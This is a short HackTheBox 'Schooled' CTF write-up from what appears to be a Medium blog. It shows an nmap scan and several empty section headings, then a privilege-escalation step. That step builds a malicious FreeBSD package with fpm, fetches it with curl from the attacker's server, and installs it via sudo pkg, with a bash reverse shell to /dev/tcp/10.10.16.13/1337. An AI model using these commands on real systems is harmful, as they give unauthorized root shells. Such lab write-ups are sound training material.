HackTheBox — Schooled

Nmap Scan

Nmap scan report for schooled.htb (10.10.10.234)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq,TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000

HTTP Enumeration

Escalating Privileges To Teacher

Initial Foothold

Lateral Movement

Getting root

On Attacker Machine

sudo gem install fpm
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF
python3 -m http.server

On Victim Machine

/usr/local/bin/curl http://<attacker-ip>:8000/x-1.0.txz -o x-1.0.txz sudo pkg install -y --no-repo-update ./x-1.0.txz

On Attacker Machine

TF=$(mktemp -d)
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.13/1337 0>&1"' > $TF/x.sh
fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF

On Victim Machine

/usr/local/bin/curl http://<attacker-ip>:8000/x-1.0.txz -o x-1.0.txz sudo pkg install -y --no-repo-update ./x-1.0.txz

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xEmbo

0xEmbo

15 Followers

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.